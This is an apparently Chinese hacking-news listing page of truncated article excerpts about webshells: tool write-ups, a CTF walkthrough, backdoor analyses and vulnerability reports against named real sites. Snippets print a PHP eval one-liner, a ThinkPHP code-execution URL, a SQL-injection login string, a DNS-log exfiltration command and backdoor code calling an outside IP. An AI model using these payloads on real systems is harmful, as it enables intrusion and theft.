记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

错误页面中隐藏webshell的骚思路

恶意软件发布者、黑客和钓鱼诈骗犯现在都喜欢把webshell隐藏在虚假HTTP错误页面中。这些页面常常伪装为错误页面,比如404未找到页面或者403禁止页面,然而它们实际上是webshell登录表单页,攻击者能够获得webshell并且在服务器上执行系统命令。这种技术并不新鲜,不过钓鱼专家和安全研究员nullcookies发现这种利用虚假错误页面隐藏webshell的做法近来有所增加。攻击者通过webshell能够上传恶意软件、钓鱼脚本或其他软件。nullcookies说,这种技术很早就有了,但我发现,最近在这种做法越来越频繁,非常明显。如果不是对这种技术有所了解,人们通常都会忽视这种页面。为了完成这篇文章,nullc
发布时间:2018-07-31 12:20 | 阅读:96356 | 评论:0 | 标签:Web安全 webshell

Powershell-Github-Shell:利用Github来做控制端的Powershell版本的Shell

项目主页 https://github.com/zlocal/Powershell-Github-Shell Author:zshell 简介 一般遇到比如说需要执行代码的时候就反弹一个shell回来.比如,一个SA权限的aspx注入,盲注的话,查结果又异常的麻烦,大多情况可能用nc会比较多,但NC的麻烦和限制或者是需要上传文件上去,而且如果是NAT情况又要有一个外网的服务器来监听使其回连。想到现在流行的windows 2008和win7及以上的比较主流,于是就周末时间利用了powershell,通过GITHUB的GIST接口实现一个反弹的shell. 特点 无程序,可以使用一句话远程内存加载powershell执行,不被杀。 HTTPS协议,在保密性和穿透性上优 易于扩展其它功能,比如加上文件上传下载就相当
发布时间:2016-12-30 00:50 | 阅读:111616 | 评论:0 | 标签:工具 Powershell-Github-Shell powershell的webshell webshell 免杀we

Weevely3:一个可用于远程服务器管理和渗透测试的命令行webshell

项目主页 https://github.com/epinna/weevely3 简介 weevely3是一款使用python编写的webshell工具(集webshell生成和连接于一身),可以算作是linux下的一款菜刀替代工具(限于php),在linux上使用时还是很给力的,就是某些模块在windows上无法使用,总的来说还是非常不错的一款工具。Weevely类似于菜刀,一个厚客户端,与一个轻服务端,由客户端生成要执行的代码,传递到服务端执行。与菜刀不同的是Weevely只提供命令行终端,同时自己生成服务端文件。 安装 Linux Debian/Ubuntu # Make sure that the python package manager and yaml libraries are instal
发布时间:2016-11-12 18:55 | 阅读:256030 | 评论:0 | 标签:工具 webshell Weevely3 命令行

novahot:一个面向渗透测试人员的webshell开源框架

项目主页 https://github.com/chrisallenlane/novahot 简介 novahot是一款面向渗透测试的开源webshell框架。它实现了一个基于JSON-based的API,可以用任何语言编写的木马进行通信。它默认附带了用PHP,Ruby和Python编写的木马。 除了执行系统命令,novahot还能够模拟终端进行交互,包括mysql,sqlite3,和psql。另外,它还实现了虚拟终端,便于上传,下载,编辑和查看远程文件。 安装 直接从NPM安装: [sudo] npm install -g novahot 然后配置文件 novahot config > ~/.novahotrc 使用 查看现有可用的木马列表: novahot trojan list 选择目标语言的一个木
发布时间:2016-11-09 03:05 | 阅读:132317 | 评论:0 | 标签:工具 novahot webshell webshell管理 渗透测试

中国最大的Webshell后门箱子调查,所有公开大马全军覆没

起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(20);error_reporting(0);define('u_b','/');define('s_u','http:// 107.182.228.74/');define('s_s','@haosou.com|360.cn| spider|360spider|so|360|sogou|sm.cn|youdao@i');define('h_t',$_SERVER['SERVER_NAME']);define('r_s',$_SERVER['HTTP_REFERER']);define('u_s',$_SERVER
发布时间:2016-11-01 16:00 | 阅读:325242 | 评论:0 | 标签:WEB安全 头条 系统安全 webshell 博彩 后门

烽火18台系列之八——Webshell,隐藏在网站之下的潘多拉魔盒

近年来网站被植入后门等隐蔽性攻击呈逐年增长态势,国家互联网应急响应中心发布的《2015年中国互联网网络安全报告》中指出,“2015年CNCERT/CC共监测到境内75028个网站被植入后门,其中政府网站有3514个。” 而Webshell则是最常用的一种网站后门工具,盛邦安全通过大量对被黑网站的应急发现,绝大多数黑客是通过后门进行的修改,并在篡改后删除后门及服务器日志。但与Webshell的危害程度相反的是,许多信息中心并没有非常重视该问题,或者可以说,业界并没有提供很好的解决办法。本文将根据盛邦安全对于Webshell的一些研究做些总结,希望给大家一些借鉴意义。 你知道或者不知道的Webshell 对于Webshell在这里我会简单介绍一下,更详细的内容大家可以百度或者查看公众号“唯品会应急响应中心”之前发
发布时间:2016-08-25 06:25 | 阅读:102238 | 评论:0 | 标签:威胁情报 Webshell 盛邦安全

PwnLab挑战技术解析

概要 这是一个boot2root的叫做Pwnlab的挑战。 我把拿到flag过程记录了下来: 过程 用vbox运行Pwnlab,并用nmap扫描下,扫描结果如下: 我们可以看到开放了80端口,打开发现运行着一个web应用。 这个应用程序包含一个登陆页面,主页和上传页面。我尝试浏览robots.txt文件,然而并不存在。所以我们使用dirb来枚举存在的目录。 打开config.php,页面是一片空白。 对网站进行扫描后,找到了一个本地文件包含漏洞,通过php://filter的方式加以利用。试着来读取index.php的源码: php://filter/convert.base64-encode/resource=index 注:php://filter可以参考:《谈一谈php://filter的妙用》
发布时间:2016-08-22 16:55 | 阅读:184998 | 评论:0 | 标签:Web安全 burpsuite ctf flag nc nmap php://filter PwnLab robots

那些年我们渗透过的灰鸽子官网

前言 上次因为被灰鸽子骗了,所以全过程的思路分享并没有写出来。那么今天,我们来弥补掉这个遗憾。没错!灰鸽子再次沦陷。 踩点 首先灰鸽子有两个域名: www.hgzvip.net ,域名注册人hkmangguo@vip.qq.com www.huigezi.org,域名注册人hkmangguo@vip.qq.com 域名商PDR LTD. D/B/A PUBLICDOMA,曾经比中国万网还牛的国外知名域名商;想必客服质量特别高2333。 半年前,我们渗透的是www.huigezi.org,那么今天我们同样要渗透这个站点 两个域名从注册人来看,明显是同一家公司。我们在查看同IP站点的时候两个网站并不在同一台服务器。这个时候,我们也不知道是不是同一个服务器,我们先进行前期信息收集。在使用人肉及密码库对比的时候,顺
发布时间:2016-08-18 04:15 | 阅读:148252 | 评论:0 | 标签:Web安全 NET对称加密 SymmetricAlgorithm webshell 加盐密文 密码学 渗透 灰鸽子

使用Powershell反弹Meterpreter Shell

撸站时难免会遇到一些比较特殊的情况,遇到一个可以执行命令的点(Windows,可连外网),却无法获得回显;这种情况下我通常会用这几种方法去尝试: 使用CloudEye获取命令执行的结果 找Web路径写WebShell 下载一个MSF的Payload直接反弹 某些情况下目标直接对公网开放3389,直接加个账户用完再删… 先说第一种方法, 使用CloudEye获取回显结果: for /F %x in ('whoami') do start http://cmd.xxxxx.dnslog.info/[%x].jpg执行这条命令,会调用默认的浏览器去打开后面的地址,我们可以获取到whoami的命令执行结果。 这里有一点比较坑的情况是如果结果中一行有空格,那这一行空格后面的结果会丢掉。 比如我执行Dir
发布时间:2016-08-16 21:05 | 阅读:103158 | 评论:0 | 标签:Web安全 CloudEye Meterpreter Shell Payload powershell webshell

看我如何绕过一个Webshell认证

当一个网站被攻击之后,攻击者通常会留一个后门或者webshell,便于将来继续控制该网站。通常会对这些webshell做一些混淆来躲避检测。并且也需要认证,保证只有攻击者能通过它控制网站。首先,我会还原混淆处理了的webshell,并演示如何在只有源代码而没有密码的情况下绕过认证。看下面的webshell例子,它被放置在某个被攻破的网站上:<?php$auth_pass = "64a113a4ccc22cffb9d2f75b8c19e333";$color = "#df5";$default_action = 'FilesMan';$default_use_ajax = true;$default_charset = 'Windows-1251';preg_replace("/.*/
发布时间:2016-05-19 18:45 | 阅读:136881 | 评论:0 | 标签:WEB安全 webshell 反混淆 认证

如何基于菜刀PHP一句话实现单个文件批量上传?

本文原创作者:安全小飞侠0×00 前言很多时候当我们通过某个通用型RCE漏洞批量抓取了很多的webshell后,可能想要批量传个后门以备后用。这时,我们不禁会面临一个问题,使用菜刀一个个上传显得太慢,那么如何快速的实现文件的批量上传呢?本文尝试以菜刀的php一句话为例来分析一下如何实现这类需求。0×01 原理分析首先,我们必须了解菜刀是如何通过一句话木马来实现web服务器的文件管理的。下面是最常见的php一句话木马:<?php eval($_POST[1]); ?>当我们将一句话木马上传到web服务器上后,我们就可以直接在菜刀中输入上面的密码(如上例中的1)连接到服务器上来管理文件。那么,此处的菜刀如何通过简单的一句话就可以实现对服务器的
发布时间:2015-12-28 16:05 | 阅读:135067 | 评论:0 | 标签:工具 php webshell 一句话 一句话木马 菜刀

中兴某站万能密码导致getshell

漏洞标题 中兴某站万能密码导致getshell 相关厂商 中兴通讯股份有限公司 漏洞作者 qhwlpg 提交时间 2015-07-29 09:18 公开时间 2015-07-29 10:08 漏洞类型 成功的入侵事件 危害等级 高 自评Rank 20 漏洞状态 漏洞已经通知厂商但是厂商忽略漏洞 Tags标签 webshell 漏洞详情 http://113.98.59.170 用户名admin'or '1'='1 密码admin'or '1'='1 漏洞证明: aspcms添加模版getshell 连菜刀不行,后来提权上cmd.exe传不上去。。 穿了asp大马,有之前入侵
发布时间:2015-07-30 03:40 | 阅读:90497 | 评论:0 | 标签:漏洞 webshell

智联招聘越权查看求职信

漏洞标题 智联招聘越权查看求职信 相关厂商 智联招聘 漏洞作者 sadn3s 提交时间 2015-04-09 12:48 公开时间 2015-05-25 20:00 漏洞类型 敏感信息泄露 危害等级 高 自评Rank 15 漏洞状态 厂商已经确认 Tags标签 敏感信息泄露 漏洞详情 智联招聘越权查看求职者的简历之求职信 漏洞证明: 随便申请个账号,进入求职信管理,随便创建封求职信,再点预览: 抓包,越小的地方越容易出大问题,又一个三不管的地方: 多试几次就看到var_id的规律了,然后调出上次遍历到的简历ID: 提交时var_id需要做处理,get不到一是根本就没有,二是删除了,遍历就好了: 剩下的我就不一一截图了,说好的隐私呢? 修
发布时间:2015-05-26 04:25 | 阅读:98733 | 评论:0 | 标签:漏洞 webshell 后台被猜解 敏感信息泄露

哇塞网分站任意代码执行漏洞

漏洞标题 哇塞网分站任意代码执行漏洞 相关厂商 北京哇噻网信息技术有限公司 漏洞作者 range 提交时间 2015-05-24 21:56 公开时间 2015-05-25 22:03 漏洞类型 文件上传导致任意代码执行 危害等级 高 自评Rank 20 漏洞状态 厂商已经修复 Tags标签 webshell 漏洞详情 漏洞存在该分站: code 区域 http://edm.wowsai.com/ thinkphp任意代码执行 code 区域 http://edm.wowsai.com/?s=/abc/abc/abc/$%7B@print(eval($_POST[1]))%7D/ 密码是1 数据库服务器: code 区域 "mysql:h
发布时间:2015-05-26 04:25 | 阅读:103672 | 评论:0 | 标签:漏洞 webshell 心血漏洞 融众网某OpenSSL

围观海航某服务器养马场(目前发现六枚shell)

漏洞标题 围观海航某服务器养马场(目前发现六枚shell) 相关厂商 海南航空 漏洞作者 路人甲 提交时间 2015-04-02 15:14 公开时间 2015-05-18 10:42 漏洞类型 成功的入侵事件 危害等级 高 自评Rank 20 漏洞状态 厂商已经确认 Tags标签 webshell 漏洞详情 看大牛公布的漏洞 WooYun: 海航某服务器存在远程命令执行可看空姐信息 于是研究研究 发现6枚shell 养马场啊 http://114.251.243.18/hhzp/resume.action 漏洞证明: 修复方案: 删除shell 版权声明:转载请注明来源 路人甲@乌云 转载请注明:安全脉搏 » 围观海航某服务
发布时间:2015-05-19 02:25 | 阅读:104940 | 评论:0 | 标签:漏洞 webshell

记一次内网渗透

前言 一客户,指定要给其公司做安全测试可从网络层面做,也可以人肉社工 :-) 对于一个小清新来说,怎么可以做人肉社工呢,要是把对方公司的妹子骗走怎么办,于是果断交给单身的同事去做了。 自己默默的看站,客户扔过来的一个域名,域名是a.com,其他什么信息都没有。 信息收集 Google搜了下,得到了一批二级域名;开起kali用fierce来一轮域名枚举,成功枚举出某域名下的子域名列表。   可以看到邮件服务器的域名是mail.a.com,采用微软的exchange所搭建。 再用Nslookup看了下mx记录,发现是 smtp1.a.com,smtp2.a.com,也就是说目标邮件服务器不是用的腾讯或者谷歌之类的企业邮箱,而是他们自己的邮件服务器。 因为一般这种情况下 邮件服务器所在的ip地址段就是
发布时间:2015-01-14 20:15 | 阅读:149154 | 评论:0 | 标签:内网渗透 020001 Boom DMZ DMZ区 fierce HTRAN ipconfig /all K8飞刀 ka

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云